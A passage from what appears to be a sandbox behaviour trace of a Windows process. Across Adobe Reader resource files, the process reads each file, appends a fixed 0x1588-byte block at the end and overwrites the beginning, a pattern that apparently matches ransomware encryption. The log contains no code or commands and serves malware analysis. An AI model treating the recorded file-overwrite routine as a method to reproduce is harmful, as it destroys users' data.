lpMultiByteStr="DisplayLanguageNames.sl.txt", lpUsedDefaultChar=0x0) returned 27 [0101.579] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0101.580] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5ef0 [0101.581] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0101.582] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5ef0 [0101.582] WriteFile (in: hFile=0x1d8, lpBuffer=0x2667a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2667a68*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0101.583] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0101.583] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0101.584] CloseHandle (hObject=0x1d8) returned 1 [0101.584] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.uk_UA.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.uk_ua.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0101.585] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0101.585] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x724e [0101.585] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0101.585] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0101.585] ReleaseMutex (hMutex=0x168) returned 1 [0101.586] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.uk_UA.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0101.586] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.uk_UA.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.uk_UA.txt", lpUsedDefaultChar=0x0) returned 30 [0101.586] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0101.587] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x624e [0101.587] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0101.588] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x624e [0101.588] WriteFile (in: hFile=0x1d8, lpBuffer=0x2667a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2667a68*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0101.589] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0101.589] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0101.589] CloseHandle (hObject=0x1d8) returned 1 [0101.589] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0114.046] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0114.047] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xc800 [0114.047] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0114.048] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.048] ReleaseMutex (hMutex=0x168) returned 1 [0114.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="brt.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0114.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="brt.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac6c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="brt.hyp", lpUsedDefaultChar=0x0) returned 7 [0114.052] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0114.064] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xb800 [0114.064] ReadFile (in: hFile=0x1fc, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0114.080] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xb800 [0114.080] WriteFile (in: hFile=0x1fc, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.081] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0114.081] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0114.081] CloseHandle (hObject=0x1fc) returned 1 [0114.095] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bul.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\bul.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0114.098] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0114.098] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x17000 [0114.098] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0114.098] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.098] ReleaseMutex (hMutex=0x168) returned 1 [0114.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bul.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0114.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bul.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac6c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bul.hyp", lpUsedDefaultChar=0x0) returned 7 [0114.098] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0114.102] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x16000 [0114.102] ReadFile (in: hFile=0x1fc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0114.110] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x16000 [0114.110] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea5988*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5988*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.110] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0114.111] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0114.111] CloseHandle (hObject=0x1fc) returned 1 [0114.111] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0114.112] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0114.112] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x7ffe [0114.112] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0114.112] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.113] ReleaseMutex (hMutex=0x168) returned 1 [0114.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="can32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="can32.clx", cchWideChar=9, lpMultiByteStr=0x1f7362c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="can32.clx", lpUsedDefaultChar=0x0) returned 9 [0114.113] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ea89b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ea89b8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0114.116] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6ffe [0114.116] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ea89b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ea89b8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0114.122] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6ffe [0114.122] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea5988*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5988*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.123] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0114.124] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea5988*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5988*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0114.124] CloseHandle (hObject=0x1fc) returned 1 [0114.124] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl28.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ctl28.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0114.125] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0114.125] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4589f [0114.125] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0114.125] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.125] ReleaseMutex (hMutex=0x168) returned 1 [0114.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ctl28.hsp", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ctl28.hsp", cchWideChar=9, lpMultiByteStr=0x1f7358c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ctl28.hsp", lpUsedDefaultChar=0x0) returned 9 [0114.125] ReadFile (in: hFile=0x1fc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0114.641] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x4489f [0114.641] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0114.643] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x4489f [0114.643] WriteFile (in: hFile=0x1fc, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.644] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0114.644] WriteFile (in: hFile=0x1fc, lpBuffer=0x28a79a8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28a79a8*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0114.644] CloseHandle (hObject=0x1fc) returned 1 [0114.644] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan45.lex" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dan45.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0114.645] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0114.645] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x74c00 [0114.646] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0114.646] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.646] ReleaseMutex (hMutex=0x168) returned 1 [0114.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dan45.lex", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dan45.lex", cchWideChar=9, lpMultiByteStr=0x1f7340c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dan45.lex", lpUsedDefaultChar=0x0) returned 9 [0114.646] ReadFile (in: hFile=0x1fc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0114.939] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x73c00 [0114.939] ReadFile (in: hFile=0x1fc, lpBuffer=0x2866c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0114.979] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x73c00 [0114.980] WriteFile (in: hFile=0x1fc, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.981] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0114.981] WriteFile (in: hFile=0x1fc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0114.981] CloseHandle (hObject=0x1fc) returned 1 [0114.981] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\eng.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\eng.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0114.983] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0114.983] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xbc00 [0114.983] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0114.983] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.983] ReleaseMutex (hMutex=0x168) returned 1 [0114.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eng.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0114.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eng.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac84, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eng.hyp", lpUsedDefaultChar=0x0) returned 7 [0114.983] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0115.015] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xac00 [0115.015] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0115.031] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xac00 [0115.031] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e953d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e953d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.032] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0115.033] WriteFile (in: hFile=0x1fc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0115.033] CloseHandle (hObject=0x1fc) returned 1 [0115.033] CreateFileW 